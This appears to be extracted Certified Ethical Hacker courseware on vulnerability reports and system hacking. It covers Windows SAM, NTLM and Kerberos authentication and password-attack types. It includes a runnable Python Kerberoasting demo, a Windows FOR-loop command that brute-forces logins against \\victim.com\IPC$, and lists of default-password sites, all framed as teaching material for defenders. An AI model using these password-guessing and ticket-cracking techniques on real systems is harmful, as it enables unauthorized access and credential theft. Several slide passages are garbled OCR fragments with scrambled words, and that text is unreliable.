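    new, resolved = diff_scans(parse_report(SCAN_1), parse_report(SCAN_2))
    print(summarize(parse_report(SCAN_2)))
    print("newly detected:", sorted(new))
    print("resolved:", sorted(resolved))
```

Keying the diff on host, port and reference rather than on the finding text is deliberate: scanner descriptions change between plugin versions, and a text-based comparison would report every reworded finding as both resolved and newly detected.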
Module Summary

This module discussed vulnerability research, vulnerability assessment, and the vulnerability-management life cycle. It also discussed the CVSS vulnerability scoring system and databases and various types of vulnerabilities and vulnerability assessment techniques. It described various vulnerability assessment solutions along with their characteristics and described various vulnerability assessment tools that are used to test a host or application for vulnerabilities, along with the criteria and best practices for selecting the tool. Finally, this module ended with a detailed discussion on how to analyze a vulnerability assessment report and how it discloses the risks detected after scanning a network.

The next module will show how attackers, as well as ethical hackers and pen testers, attempt system hacking based on the information collected about a target in the footprinting, scanning, enumeration, and vulnerability analysis phases.
Certified Ethical Hacker

Module 06: System Hacking
Module Objectives

System hacking is one of the most important, and sometimes the ultimate, goal of an attacker. The attacker acquires information through techniques such as footprinting, scanning, enumeration, and vulnerability analysis and then uses this information to hack the target system. This module will focus on the tools and techniques used by an attacker to hack the target system.

The module begins with an overview of the hacking methodology. Next, it discusses in detail the various hacking stages, such as gaining and maintaining access and clearing logs.

At the end of this module, you will be able to do the following:
- Describe the Certified Ethical Hacker hacking methodology
- Explain the different techniques to gain access to a system
- Apply privilege escalation techniques
- Explain different techniques to gain and maintain remote access to a system
- Describe different types of rootkits
- Explain steganography and steganalysis techniques
- Apply different techniques to hide the evidence of compromise
- Apply various system hacking countermeasures
Module Flow

System Hacking Concepts

An attacker engages in system hacking attempts using information collected in earlier footprinting, scanning, enumeration, and vulnerability analysis phases. The following is an overview of these phases and the information collected so far.

We have already discussed the following in our previous modules:
- Footprinting Module: Footprinting is the process of accumulating data about a specific network environment. In the footprinting phase, the attacker creates a profile of the target organization and obtains information such as its IP address range, namespace, and employees. Footprinting facilitates the process of system hacking by revealing its vulnerabilities. For example, the organization's website may provide employee bios or a personnel directory, which the hacker can use for social engineering purposes. Conducting a Whois query on the web can provide information about the associated networks and domain names related to a specific organization.
- Scanning Module: Scanning is a procedure used for identifying active hosts, open ports, and unnecessary services enabled on particular hosts. Attackers use different types of scanning methods for host discovery, port and service discovery, operating system (OS) discovery, and evading endpoint security devices such as intrusion detection systems (IDSs) and firewalls. These techniques help attackers identify possible vulnerabilities. Scanning procedures such as port scanning and ping sweeps return information about the services offered by the live hosts that are active on the Internet, and their IP addresses.
- Enumeration Module: Enumeration is a method of intrusive probing, through which attackers gather information such as network user lists, routing tables, security flaws, and shared and Simple Network Management Protocol (SNMP) data. This is of significance, because the attacker ranges over the target territory to glean information about the network, users, groups, applications, and banners.
  Enumeration involves making active connections to the target system or subjecting it to direct queries. Normally, an alert and secure system logs such attempts. Often, the information gathered, such as a DNS address, is publicly available; however, it is possible that the attacker might stumble upon a remote IPC share, such as IPC$ in Windows, that can be probed with a null session, thereby allowing shares and accounts to be enumerated.
- Vulnerability Analysis Module: Vulnerability assessment is an examination of the ability of a system or application, including its current security procedures and controls, to withstand assault. It recognizes, measures, and classifies security vulnerabilities in a computer system, network, and communication channels.
  Attackers perform vulnerability analysis to identify security loopholes in the target organization's network, communication infrastructure, and end systems. The identified vulnerabilities are used by the attackers to perform further exploitation on that target network.
CEH Hacking Methodology (CHM)

Attackers follow a certain methodology to hack a system. They first obtain information during the footprinting, scanning, enumeration, and vulnerability analysis phases, which they then use to exploit the target system. The figure shows the steps and flow mechanisms between steps in the CEH hacking methodology (CHM).

Figure 6.1: CEH hacking methodology (Footprinting, Scanning, Enumeration and Vulnerability Analysis lead into System Hacking: Gaining Access (Cracking Passwords, Escalating Privileges), Maintaining Access (Executing Applications, Hiding Files), and Clearing Logs (Covering Tracks))
There are four steps in the CHM:

- Gaining Access
  The previous phases of hacking, including footprinting and reconnaissance, scanning, enumeration, and vulnerability assessment, help attackers to identify security loopholes and vulnerabilities that exist in the target organizational IT assets. Attackers use this information, along with techniques such as cracking passwords and exploiting vulnerabilities such as buffer overflows, to gain access to the target organizational system.
  Password cracking involves gaining access to low-privileged user accounts by cracking passwords using techniques such as brute-forcing, password guessing, and social engineering. Attackers exploit the identified vulnerabilities, such as buffer overflows, to gain root-level access to the target system.

- Escalating Privileges
  After gaining access, attackers then escalate their privileges to administrative levels, to perform a protected operation. Attackers exploit vulnerabilities that exist in OSs and software applications to escalate privileges.

- Maintaining Access
  After successfully gaining access and escalating privileges to the target system, attackers ensure that high levels of access are maintained to perform malicious activities such as executing malicious applications and stealing, hiding, or tampering with sensitive system files.

- Clearing Logs
  To maintain future system access, attackers attempt to avoid recognition by legitimate system users. To remain undetected, attackers wipe out the entries corresponding to their activities in the system logs, thus avoiding detection by users.
System Goals
Hacking
Hacking Stage

bypat
acest ‘Technique
contralto /Exploit
Goat Used

@Gsining soca
Te gla
Access ‘roltaton,
engineering
©Excataing
Priviteges

©Executing
Applications eons
@Hising
rites

©Covering
Tacks

System Goals
Hacking
Every
criminalhasa certain goalthat theyintend to achieve.Likewise, attackerscan have
certain goalsfor performing systemattacks.Thefollowingare some examples of thegoalsof
system attackers.Thefollowingdiagram showsthesegoals at different hacking
stagesandthe
to them,
used achieve
techniques
Hacking-Stage Goat ‘Technique/Exploit
Used

@Gaining access Bowes acon onieb wah

©
Escalating
Privileges
Executing
©
Applications
@Hiding Fies

©Covering
Tracks Geming
oes

Gaining Access

In system hacking, the attacker first tries to gain access to a target system using the information obtained during reconnaissance and the loopholes found in the access control mechanism of the system. The attacker uses techniques such as password cracking, vulnerability exploitation, and social engineering tactics to gain this access. Once the attacker succeeds in gaining access to the system, they can freely perform various malicious activities such as stealing sensitive data, implementing a sniffer to capture network traffic, and infecting the system with malware.
Escalating Privileges

After gaining access to a system using a low-privileged normal user account, the attacker may then try to escalate to administrator privileges to perform protected system operations, so that they can proceed to the next phase of system hacking, which is the execution of applications. The attacker exploits known system vulnerabilities to escalate user privileges.
Executing Applications

Once the attacker has administrator privileges, they can attempt to install malicious programs such as Trojans, backdoors, rootkits, and keyloggers, which grant them remote system access and enable them to execute malicious code remotely. Installing rootkits allows the attacker to gain access at the OS level to perform malicious activities. To maintain access for later use, they may also install backdoors.
Hiding Files

Attackers use rootkits and steganography techniques to hide the malicious files they install on the system, and thus their activities.
Covering Tracks

To remain undetected, it is important for the attackers to erase from the system all evidence of the security compromise. To achieve this, they might modify or delete logs in the system using log-wiping utilities, thus removing all evidence of their presence.

Module Flow

[Slide: module flow. 1. System Hacking Concepts; 2. Gaining Access; 3. Escalating Privileges; 4. Maintaining Access; 5. Clearing Logs]
Asdiscussed CHMinvolves
earlier, various stepsattackers
followto hacksystems. Thefollowing
sections discuss
thesestepsi n greaterdetail. Thefirst step,whichis the gaining of access,
involvesthe use of various techniques that attackers
employ to gain access to the target
system.These techniques include cracking passwords,exploitingbuffer overflows, and
vulnerabilities.
identifying

ical andCountermensores
Mackin ©by E-Comel
Copyright
[Slide: Microsoft Authentication. Security Accounts Manager (SAM) Database: Windows stores user passwords in the SAM database or the Active Directory database; passwords are never stored in clear text, they are hashed and the results are stored in the SAM. NTLM Authentication: the NTLM protocol types are NTLM and LM authentication, which use different hashing methods. Kerberos Authentication: Microsoft has upgraded its default authentication protocol to Kerberos, which provides stronger authentication for client/server applications.]
Microsoft Authentication

When users log in to a Windows computer, a series of steps is performed for user authentication. The Windows OS authenticates its users with the help of three mechanisms (protocols) provided by Microsoft.

Security Accounts Manager (SAM) Database

Windows uses the Security Accounts Manager (SAM) database or the Active Directory database to manage user accounts and passwords in hashed format (a one-way hash). The system does not store the passwords in plaintext format but in a hashed format, to protect them from attacks. The system implements the SAM database as a registry file, and the Windows kernel obtains and keeps an exclusive filesystem lock on the SAM file; this provides some measure of security for the storage of passwords.

Because the system locks the SAM file with an exclusive filesystem lock, a user cannot copy or move it while Windows is running, so it is not possible to copy the SAM file to another location in an online attack. The lock does not release until the system throws a blue screen exception or the OS has shut down. However, to make the password hashes available for offline brute-force attacks, attackers can dump the on-disk contents of the SAM file using various techniques (for example, exporting the SAM and SYSTEM registry hives with administrative privileges, or reading the file from a Volume Shadow Copy). The SAM file uses the SYSKEY function (in Windows NT 4.0 and later versions) to partially encrypt the password hashes; the key for that encryption is derived from the SYSTEM hive, so the SAM file on its own does not yield usable hashes.

Even if hackers use subterfuge techniques to discover the contents, the fact that the stored values are one-way hashes under an additional layer of encryption makes them difficult to recover. In addition, some versions have a secondary key, which makes the encryption specific to that copy of the OS.
NTLM Authentication

NT LAN Manager (NTLM) is a default authentication scheme that performs authentication using a challenge/response strategy. Because NTLM was designed as a proprietary protocol rather than against an open standard (Microsoft later documented it as the MS-NLMP specification), there is no guarantee that it works effectively in every situation. Furthermore, it has been used in some Windows installations, where it successfully worked. NTLM authentication consists of two protocols: the NTLM authentication protocol and the LAN Manager (LM) authentication protocol. These protocols use different hash methodologies to store users' passwords in the SAM database.
Kerberos Authentication

Kerberos is a network authentication protocol that provides strong authentication for client/server applications through secret-key cryptography. This protocol provides mutual authentication, in that both the server and the user verify each other's identity. Messages sent through the Kerberos protocol are protected against replay attacks and eavesdropping.

Kerberos employs the Key Distribution Center (KDC), which is a trusted third party. This logically consists of two distinct parts: an authentication server (AS) and a ticket-granting server (TGS). Kerberos uses "tickets" to prove a user's identity.

Microsoft has upgraded its default authentication protocol to Kerberos, which provides stronger authentication for client/server applications than NTLM.

Figure 6.3: Screenshot of Windows authentication ("Enter network credentials" dialog with "Remember my credentials" option and "The user name or password is incorrect" message)
How Hash Passwords Are Stored in Windows SAM?

Windows OSs use a Security Account Manager (SAM) database file to store user passwords. The SAM file is stored at %SystemRoot%\system32\config\SAM on Windows systems, and Windows mounts it in the registry under the HKLM\SAM registry hive. It stores LM or NTLM hashed passwords.

Figure 6.4: Storing a user password using LM/NTLM hash

NTLM supersedes the LM hash, which is susceptible to cracking: the LM hash upper-cases the password and splits it into two independent 7-character halves, so each half can be attacked separately. The NT hash is the unsalted MD4 digest of the UTF-16LE encoded password, so identical passwords always produce identical hashes. New versions of Windows still support LM hashes for backward compatibility; however, Vista and later Windows versions disable LM hashes by default. The LM hash is blank in the newer versions of Windows. Selecting the option to remove LM hashes enables an additional check during password change operations but does not immediately clear LM hash values from the SAM. The SAM file stores a "dummy" value in its database, which bears no relationship to the user's actual password and is the same for all user accounts (in pwdump-style output it appears as aad3b435b51404eeaad3b435b51404ee). It is not possible to calculate LM hashes for passwords exceeding 14 characters in length. Thus, the LM hash value is set to the "dummy" value when a user or administrator sets a password of more than 14 characters.

Figure 6.5: SAM file (c:\windows\system32\config\SAM)

Note: LM hashes are disabled in Windows Vista and later Windows OSs; the LM hash is blank in those systems.
NTLM Authentication Process

NTLM includes three methods of challenge-response authentication: LM, NTLMv1, and NTLMv2, all of which use the same technique for authentication. The only difference between them is the strength of the cryptographic computation used for the response (DES-based for LM and NTLMv1, HMAC-MD5 for NTLMv2). In NTLM authentication, the client and server negotiate an authentication protocol. This is accomplished through the Microsoft-negotiated Security Support Provider (SSP).

Figure 6.6: NTLM authentication process (client and Windows domain controller)
The following steps demonstrate the process and the flow of client authentication to a domain controller using any NTLM protocol:

1. The client types the username and password into the logon window.
2. Windows runs the password through a hash algorithm and generates a hash for the password that is entered in the logon window.
3. The client computer sends a login request along with a domain name to the domain controller.
4. The domain controller generates an 8-byte random value called the server challenge, or "nonce," which it sends to the client computer.
5. The client computer encrypts the nonce with the hash of the user password and sends the result back to the domain controller. The hash itself is never sent over the network.
6. The domain controller retrieves the hash of the user password from the SAM (or Active Directory) and uses it to perform the same computation on the nonce. The domain controller then compares its result with the value received from the client. A matching value authenticates the client, and the logon is successful.

Note: Microsoft has upgraded its default authentication protocol to Kerberos, which provides stronger authentication for client/server applications than NTLM.
Kerberos Authentication

[Slide: Kerberos authentication. Key Distribution Center (KDC), client, and application server.]

Kerberos is a network authentication protocol that provides strong authentication for client/server applications through secret-key cryptography, which provides mutual authentication. Both the server and the user verify each other's identity. Messages sent through this protocol are protected against replay attacks and eavesdropping.

Figure 6.7: Kerberos authentication process (client, KDC with AS and TGS, application server)

Kerberos employs the KDC, which is a trusted third party and consists of two logically distinct parts: an AS and a TGS. The authorization mechanism of Kerberos provides the user with a ticket-granting ticket (TGT) that serves, after authentication, for later access to specific services: single sign-on, via which the user need not re-enter the password to access any authorized service. Notably, there is no direct communication between the application servers and the KDC; the service tickets, even though packed by the TGS, reach the service only through the client who wants to access them.
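The property just described, that a service validates a ticket with nothing but its own long-term key and never talks to the KDC, is also what the Kerberos password-cracking attacks shown later in this module (AS-REP roasting and Kerberoasting) depend on. The following is an added example, not EC-Council code, that models the AS, TGS and AP exchanges in Python and then runs an offline Kerberoast against the issued service ticket. It is a toy: the real protocol uses ASN.1-encoded messages, AES or RC4 encryption types and a proper string-to-key function, whereas here a SHA-256/HMAC construction stands in for all three so that the example runs with the standard library only. Principal names, passwords and the weak service-account password are constructed for the example.

```python
import hashlib
import hmac
import json
import os
import time


def string_to_key(password: str) -> bytes:
    # Stand-in for the Kerberos string-to-key function (assumption, not the real KDF).
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    blocks = (hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
              for i in range(length // 32 + 1))
    return b"".join(blocks)[:length]


def encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC with a SHA-256 keystream; stand-in for the Kerberos etypes."""
    nonce = os.urandom(16)
    ct = bytes(p ^ s for p, s in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def decrypt(key: bytes, blob: bytes):
    """Returns the plaintext, or None when the key is wrong or the blob was tampered with."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        return None
    return bytes(c ^ s for c, s in zip(ct, _keystream(key, nonce, len(ct))))


class KDC:
    """Authentication Server (AS) and Ticket-Granting Server (TGS) over one key database."""

    def __init__(self, principals):            # {principal name: long-term key}
        self.keys = principals
        self.krbtgt_key = os.urandom(32)       # key that seals TGTs

    def as_exchange(self, client: str):
        """AS-REQ/AS-REP: a TGT plus the TGT session key sealed with the client's key."""
        sk = os.urandom(32)
        body = {"client": client, "sk": sk.hex(), "exp": time.time() + 600}
        return (encrypt(self.krbtgt_key, json.dumps(body).encode()),
                encrypt(self.keys[client], sk))

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, service: str):
        """TGS-REQ/TGS-REP: check the TGT and authenticator, issue a ticket for `service`."""
        raw = decrypt(self.krbtgt_key, tgt)
        if raw is None:
            raise ValueError("forged or corrupted TGT")
        tgt_body = json.loads(raw)
        sk = bytes.fromhex(tgt_body["sk"])
        auth = decrypt(sk, authenticator)        # proves the client knows the session key
        if auth is None or json.loads(auth)["client"] != tgt_body["client"] \
                or tgt_body["exp"] < time.time():
            raise ValueError("bad authenticator or expired TGT")
        svc_sk = os.urandom(32)
        ticket_body = {"client": tgt_body["client"], "sk": svc_sk.hex()}
        ticket = encrypt(self.keys[service], json.dumps(ticket_body).encode())
        return ticket, encrypt(sk, svc_sk)


def service_accepts(service_key: bytes, ticket: bytes, authenticator: bytes) -> bool:
    """AP-REQ check on the application server: only its own long-term key is needed."""
    raw = decrypt(service_key, ticket)
    if raw is None:
        return False
    body = json.loads(raw)
    auth = decrypt(bytes.fromhex(body["sk"]), authenticator)
    return auth is not None and json.loads(auth)["client"] == body["client"]


def kerberoast(ticket: bytes, candidates):
    """Offline guessing against a service ticket: each candidate password becomes a key and
    is tried on the ticket; no traffic reaches the KDC and no account lockout is triggered."""
    for pw in candidates:
        if decrypt(string_to_key(pw), ticket) is not None:
            return pw
    return None


def demo():
    alice_pw, svc_pw = "correct horse battery", "Summer2020"   # constructed; svc_pw is weak on purpose
    kdc = KDC({"alice": string_to_key(alice_pw), "svc_sql": string_to_key(svc_pw)})
    tgt, sealed_sk = kdc.as_exchange("alice")
    sk = decrypt(string_to_key(alice_pw), sealed_sk)            # client recovers the TGT session key
    tgs_auth = encrypt(sk, json.dumps({"client": "alice", "ts": time.time()}).encode())
    ticket, sealed_svc_sk = kdc.tgs_exchange(tgt, tgs_auth, "svc_sql")
    svc_sk = decrypt(sk, sealed_svc_sk)
    ap_auth = encrypt(svc_sk, json.dumps({"client": "alice", "ts": time.time()}).encode())
    accepted = service_accepts(kdc.keys["svc_sql"], ticket, ap_auth)
    cracked = kerberoast(ticket, ["Password1", "Welcome1", "Summer2020"])
    return accepted, cracked


if __name__ == "__main__":
    print(demo())   # (True, 'Summer2020')
```

The point of the last two calls is the asymmetry the text describes: the service verified the ticket locally, and an attacker holding a copy of that same ticket (any domain user can request one for any service with an SPN) can test passwords against it at full speed with no contact with the KDC. The defence is the same in the toy and in practice: long, random service-account passwords or group managed service accounts, plus AES-only encryption types.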
Password Cracking

[Slide: Password cracking techniques are used to recover passwords from computer systems. Attackers use password cracking techniques to gain unauthorized access to vulnerable systems. Most password cracking techniques are successful because of weak or easily guessable passwords.]

Password cracking is the process of recovering passwords from the data transmitted by a computer system or from the data stored in it. The purpose of cracking a password might be to help a user recover a forgotten or lost password, to check for easily breakable passwords as a preventive measure by system administrators, or for use by an attacker to gain unauthorized system access.

Hacking often begins with password-cracking attempts. A password is a key piece of information necessary to access a system. Consequently, most attackers use password-cracking techniques to gain unauthorized access. An attacker may either crack a password manually by guessing it or use automated tools and techniques such as a dictionary or a brute-force method. Most password-cracking techniques are successful because of weak or easily guessable passwords.
Types of Password Attacks

[Slide: Non-Electronic Attacks: the attacker does not need technical knowledge to crack the password, hence these are known as non-technical attacks. Active Online Attacks: the attacker performs password cracking by directly communicating with the victim machine. Passive Online Attacks: the attacker performs password cracking without communicating with the authorizing party. Offline Attacks: the attacker copies the target's password file to a different location on his own system and then tries to crack the passwords.]

Password cracking is one of the crucial stages of system hacking. Password-cracking mechanisms often exploit otherwise legal means to gain unauthorized system access, such as recovering a user's forgotten password. Classification of password attacks depends on the attacker's actions, which are of the following four types:

Non-Electronic Attacks: This is, in most cases, the attacker's first attempt at gaining target system passwords. Non-electronic or non-technical attacks do not require any technical knowledge about hacking or system exploitation. Techniques used to perform non-electronic attacks include shoulder surfing, social engineering, dumpster diving, etc.

Active Online Attacks: This is one of the easiest ways to gain unauthorized administrator-level system access. Here, the attacker communicates with the target machine to gain password access. Techniques used to perform active online attacks include password guessing, dictionary and brute-forcing attacks, hash injection, LLMNR/NBT-NS poisoning, use of Trojans/spyware/keyloggers, internal monologue attacks, Markov-chain attacks, Kerberos password cracking, etc.

Passive Online Attacks: A passive attack is a type of system attack that does not lead to any changes in the system. In this attack, the attacker does not have to communicate with the system but passively monitors or records the data passing over the communication channel to and from the system. The data are then used to break into the system. Techniques used to perform passive online attacks include wire sniffing, man-in-the-middle attacks, replay attacks, etc.

Offline Attacks: Offline attacks refer to password attacks in which an attacker tries to recover cleartext passwords from a password hash dump. Offline attacks are often time-consuming but have a high success rate: a hash cannot be reversed, but fast unsalted hashes such as LM and NT can be tested at very high guess rates, so short or low-entropy passwords fall quickly. Attackers also use pre-computed hashes from rainbow tables (which work only against unsalted hashes) to perform offline and distributed network attacks.
Non-Electronic Attacks

[Slide: Social Engineering: convincing people to reveal passwords. Shoulder Surfing: looking at either the user's keyboard or screen while he/she is logging in. Dumpster Diving: searching for sensitive information in the user's trash bins, printer trash bins, and on the user's desk for sticky notes.]

Non-electronic, or non-technical, attacks do not require technical knowledge of methods of system intrusion. There are three types of non-electronic attacks: social engineering, shoulder surfing, and dumpster diving.

Social Engineering

In computer security, social engineering denotes a non-technical type of intrusion that exploits human behavior. Typically, it relies heavily on human interaction and often involves tricking other people into breaking normal security procedures. A social engineer runs a "con game" to break security procedures. For example, an attacker using social engineering to break into a computer network might try to gain the trust of an authorized user of the target network and then extract information to compromise network security. Social engineering is, in effect, a run-through used to procure confidential information by deceiving or swaying people. An attacker can disguise himself/herself as a user or system administrator to obtain the user's password. Social engineers exploit the fact that people, in general, try to build amicable relationships with their friends and colleagues and tend to be helpful and trusting.

Another trait of social engineering relies on the inability of people to keep up with a culture that relies heavily on information technology. Most people are unaware of the value of the information they possess, and as such, only a handful care about protecting their information. Social engineers typically search dumpsters to acquire valuable information. Furthermore, social engineers find it more challenging to obtain the combination to a safe or a health-club locker than to obtain a password. The best defense is to educate, train, and create awareness about this attack and the value of information.
Shoulder Surfing

Shoulder surfing is a technique of stealing passwords by hovering near legitimate users and watching them enter their passwords. In this type of attack, the attacker observes the user's keyboard or screen as they log in, and monitors what the user refers to when entering their password, for example, an object on their desk with written passwords or mnemonics. However, this attack can be performed only when the attacker is in close proximity to the target.

This attack can also be performed in the checkout lines of grocery stores, for example, when a potential victim swipes a debit card and enters the required PIN (Personal Identification Number). A PIN typically has four digits, which renders the attack easy to perform.

Dumpster Diving

"Dumpster diving" is a key attack method that exploits significant failures in computer security in the target organization. The sensitive information that people crave, protect, and devotedly secure can be accessed by almost anyone willing to perform garbage searching. Looking through the trash is a type of low-tech attack with numerous implications.

Dumpster diving was quite popular in the 1980s. The term itself refers to the collection of useful, general information from waste dumps such as trash cans, curbside containers, and dumpsters. Even today, curious and/or malicious attackers sometimes find discarded media with password files, manuals, reports, credit card numbers, receipts, or other sensitive documents. Examination of products from waste dumps can help attackers in gaining unauthorized access to the target systems, and there is ample evidence to support this concept. Support staff often dump sensitive information without heeding who may be able to access it later. The information thus gathered can then be used by attackers to perform other types of attacks, such as social engineering.
Active Online Attacks: Dictionary, Brute-Force, and Rule-based Attack

[Slide: Dictionary Attack: a dictionary file is loaded into the cracking application that runs against user accounts. Brute-Force Attack: the program tries every combination of characters until the password is broken. Rule-based Attack: this attack is used when the attacker gets some information about the password.]

Active Online Attacks: Password Guessing

[Slide: The attacker creates a list of all possible passwords from the information collected through social engineering or any other way and manually inputs them on the victim's machine to crack the passwords. Steps: find a valid user; create a list of possible passwords; rank passwords from high to low probability; key in each password until the correct password is discovered.]
Default Passwords

[Slide: Attackers use default passwords present in the list of words or dictionary that they use to perform password guessing. Online tools to search default passwords: http://open-sez.me, https://www.fortypoundhead.com, https://cirt.net, http://www.defaultpassword.us, http://defaultpasswords.in, https://www.routerpasswords.com, https://default-password.info]
Active Online Attacks: Trojans/Spyware/Keyloggers

[Slide: The attacker installs a Trojan/spyware/keylogger on the victim's machine to collect the victim's usernames and passwords. The Trojan/spyware/keylogger runs in the background and sends back all user credentials to the attacker.]
Active Online Attacks: Hash Injection/Pass-the-Hash (PtH) Attack

[Slide: the attacker injects a compromised hash into a local session and uses the hash to validate to network resources; the attacker finds and extracts the hashes of logged-on users. Details in the body text below.]

Active Online Attacks: LLMNR/NBT-NS Poisoning

[Slide: diagram not legible in this extraction; see the description below.]
Active Online Attacks: Internal Monologue Attack

[Slide: Attackers perform an internal monologue attack in which they use SSPI (Security Support Provider Interface) to invoke a local procedure call to the NTLM authentication package from a user-mode application and obtain a NetNTLM response in the context of the logged-on user.]

Active Online Attacks: Cracking Kerberos Password

[Slide: AS-REP Roasting (Cracking TGT); Kerberoasting (Cracking TGS). Remaining slide text not legible in this extraction.]
Active Online Attacks: Pass the Ticket Attack

[Slide: attackers authenticate to systems using stolen Kerberos tickets (ST/TGT) taken from a user's machine; tools such as Mimikatz help extract password hashes and tickets.]
Active Online Attacks

Dictionary Attack

In this type of attack, a dictionary file is loaded into a cracking application that runs against user accounts. This dictionary is a text file that contains several dictionary words commonly used as passwords. The program uses every word present in the dictionary to find the password. In addition to a standard dictionary, attackers' dictionaries contain entries with numbers and symbols added to words (e.g., "3December!962"). Simple keyboard finger rolls ("qwer0987"), which many believe to produce random and secure passwords, are thus included in such a dictionary. Dictionary attacks are more efficient than brute-force attacks; however, they are of little use against long passphrases that do not appear in any wordlist.

This attack is applicable in two situations:
o In cryptanalysis, to discover the decryption key for obtaining the plaintext from a ciphertext
o In computer security, to bypass authentication and the access control mechanism of the computer by guessing passwords

Methods to improve the success of a dictionary attack:
o Use of several different dictionaries, such as technical and foreign dictionaries, which increases the number of possibilities
o Use of string manipulation along with the dictionary (e.g., if the dictionary contains the word "system," string manipulation creates anagrams like "metsys," among others)
Brute-Force Attack

In a brute-force attack, attackers try every combination of characters until the password is broken. Cryptographic algorithms must be sufficiently hardened to prevent a brute-force attack, which is defined by RSA as follows: "Exhaustive key-search, or brute-force search, is the basic technique for trying every possible key in turn until the correct key is identified."

A brute-force attack is when someone tries to produce every single encryption key for data to detect the needed information. Even today, only those with enough processing power can successfully perform this type of attack against anything but a small keyspace.

Exhaustive key search is the simplest form of cryptanalysis: it employs a search of the whole keyspace. In other words, testing all possible keys is one of the attempts to recover the plaintext used to produce a particular ciphertext. Finding the key or plaintext faster than a brute-force attack is one way of breaking the cipher. A cipher is considered secure if no method exists to break it other than a brute-force attack. In general, ciphers lack a mathematical proof of security. If the user chooses keys randomly, or the attacker searches randomly, the plaintext will become available on average after the attacker has tried half of all the possible keys.

Some of the considerations for brute-force attacks are as follows:
o It is a time-consuming process
o All passwords will eventually be found, given enough time; in practice the search space grows exponentially with password length, so a long random password is out of reach
Rule-based Attack

Attackers use this type of attack when they obtain some information about the password. This is a more powerful attack than dictionary and brute-force attacks because the cracker knows the password type. For example, if the attacker knows that the password contains a two- or three-digit number, he/she can use some specific techniques to extract the password quickly. By obtaining useful information, such as the way in which numbers and/or special characters have been used, and the password length, attackers can minimize the time required to crack the password and therefore enhance the cracking tool. This technique involves brute force, a dictionary, and syllable attacks.

For online password-cracking attacks, an attacker will sometimes use a combination of both brute force and a dictionary. This combination falls into the categories of hybrid and syllable password-cracking attacks.

o Hybrid Attack
This type of attack depends on the dictionary attack. Often, people change their passwords merely by adding some numbers to their old passwords. In this case, the program would add some numbers and symbols to the words from the dictionary to try to crack the password. For example, if the old password is "system," then there is a chance that the person will change it to "system1" or "system2."

o Syllable Attack
Hackers use this cracking technique when passwords are not known words. Attackers use the dictionary and other methods to crack them, as well as all possible combinations of them.

Password Guessing

Password guessing is a password-cracking technique that involves attempting to log on to the target system with different passwords manually. Guessing is the key element of manual password cracking. The attacker creates a list of all possible passwords from the information collected through social engineering or any other method and tries them manually on the victim's machine to crack the passwords.

The following are the steps involved in password guessing:
o Find a valid user
o Create a list of possible passwords
o Rank passwords from high to low probability
o Key in each password, until the correct password is discovered

Hackers can crack passwords manually or by using automated tools, methods, and algorithms. They can also automate password cracking using a simple FOR loop, or create a script file that tries each password in a list. These techniques are still considered manual cracking. The failure rate of this type of attack is high.

Manual Password-Cracking Algorithm

In its simplest form, this algorithm can automate password guessing using a simple FOR loop. In the example that follows, an attacker creates a simple text file with usernames and passwords and iterates through them using the FOR loop. The main FOR loop extracts the usernames and passwords from the text file, which serves as a dictionary as it iterates through every line:

    [file: credentials.txt]
    administrator ""
    administrator password
    administrator administrator
    [etc.]

Type the following commands to access the text file from a directory:

    C:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^
    More? do net use \\victim.com\IPC$ %j /u:victim.com\%i^
    More? 2>>nul^
    More? && echo %time% %date% >> outfile.txt^
    More? && echo \\victim.com acct: %i pass: %j >> outfile.txt
    C:\>type outfile.txt

Each line of credentials.txt is split into the username (%i) and password (%j); net use attempts to map the IPC$ share of the target with that pair, error output is discarded by 2>>nul, and only when the connection succeeds do the && branches record a timestamp and the working pair. The outfile.txt file therefore contains the correct username and password if a pair in credentials.txt is correct. An attacker can then establish an open session with the victim server from his/her system. Note that every failed attempt produces a failed-logon event on the target and counts against any account-lockout threshold, which is why this technique is both slow and noisy.
Default Passwords

Default passwords are those supplied by manufacturers with new equipment (e.g., switches, hubs, routers). Usually, default passwords provided by the manufacturers of password-protected devices allow the user to access the device during the initial setup and then change the password. However, often an administrator will either forget to set a new password or ignore the password-change recommendation and continue using the original password. Attackers can exploit this lapse and find the default password for the target device from manufacturer websites or using online tools that show default passwords, and so access the target device successfully. Attackers include default passwords in the list of words or dictionary that they use to perform password-guessing attacks.

The following are some of the online tools to search default passwords:
o http://open-sez.me
o https://www.fortypoundhead.com
o https://cirt.net
o http://www.defaultpassword.us
o http://defaultpasswords.in
o https://www.routerpasswords.com
o https://default-password.info

Figure 6.8: Screenshot showing default passwords
Trojans/Spyware/Keyloggers

A Trojan is a program that masks itself as a benign application. The software initially appears to perform a desirable or benign function, but instead steals information or harms the system. With a Trojan, attackers can gain remote access and perform various operations on the target computer, limited by the privileges of the user running it.

Spyware is a type of malware that attackers install on a computer to secretly gather information about its users without their knowledge. Spyware hides itself from the user and can be difficult to detect.

A keylogger is a program that records all user keystrokes without the user's knowledge. Keyloggers ship the log of user keystrokes to an attacker's machine or hide it on the victim's machine for later retrieval. The attacker then scrutinizes the log to find passwords or other useful information that could compromise the system.

An attacker installs a Trojan/spyware/keylogger on a victim's machine to collect their usernames and passwords. These programs run in the background and send back all user credentials to the attacker. For example, a keylogger on a victim's computer can reveal the contents of all user emails. The following image depicts a scenario describing how an attacker gains password access using a Trojan/spyware/keylogger.

Figure 6.9: Active online attack using Trojan/spyware/keylogger

Hash Injection/Pass-the-Hash (PtH) Attack

This type of attack is possible when the target system uses a hash function as part of the authentication process to authenticate its users. Generally, the system stores hash values of the credentials in the SAM database/file on a Windows computer. In such cases, the server computes the hash value of the user-submitted credentials or allows the user to input the hash value directly. The server then checks it against the stored hash value for authentication. In NTLM specifically, the password hash is never sent over the network; the client uses it only to compute the challenge response, so whoever possesses the hash can produce a valid response without ever knowing the password.
Figure 6.10: Hash injection attack (user computer and attacker)

